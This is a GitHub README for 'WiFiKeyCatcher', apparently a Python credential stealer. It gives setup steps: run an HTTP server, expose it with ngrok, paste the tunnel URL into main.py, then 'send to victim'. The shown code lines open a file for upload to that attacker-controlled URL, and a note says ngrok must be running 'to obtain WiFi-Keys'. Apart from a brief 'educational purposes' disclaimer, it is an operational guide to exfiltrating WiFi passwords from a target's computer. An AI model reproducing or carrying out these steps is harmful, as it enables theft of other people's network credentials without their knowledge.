Skip to content

ibnaleem/WiFiKeyCatcher

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 

Repository files navigation

⚠️ Disclaimer: This repository is intended for educational purposes exclusively. I bear no responsibility for any illicit or unauthorized use of this project.

Setup

  1. Clone this repository:
$ git clone https://github.com/ibnaleem/WiFiKeyCatcher.git
  1. Run HTTPServer:
$ py -m http.server
  1. Install ngrok
  2. Configure auth-token in terminal:
$ ngrok config add-authtoken <token>
  1. Start tunnel on port 8000:
$ ngrok http 8000

If successful, you should see all of your system directories as embeded links.

  1. Copy ngrok URL and paste into main.py (line 52):
url = "https://ngrok-url-here"
files = {'file': open(f'{curr_path}.txt', 'rb')}

Save and send to victim. Note: ngrok must be running to obtain WiFi-Keys

Target Ran Script, Nothing Received

Make sure your target has Python installed, and you're running HTTP server + ngrok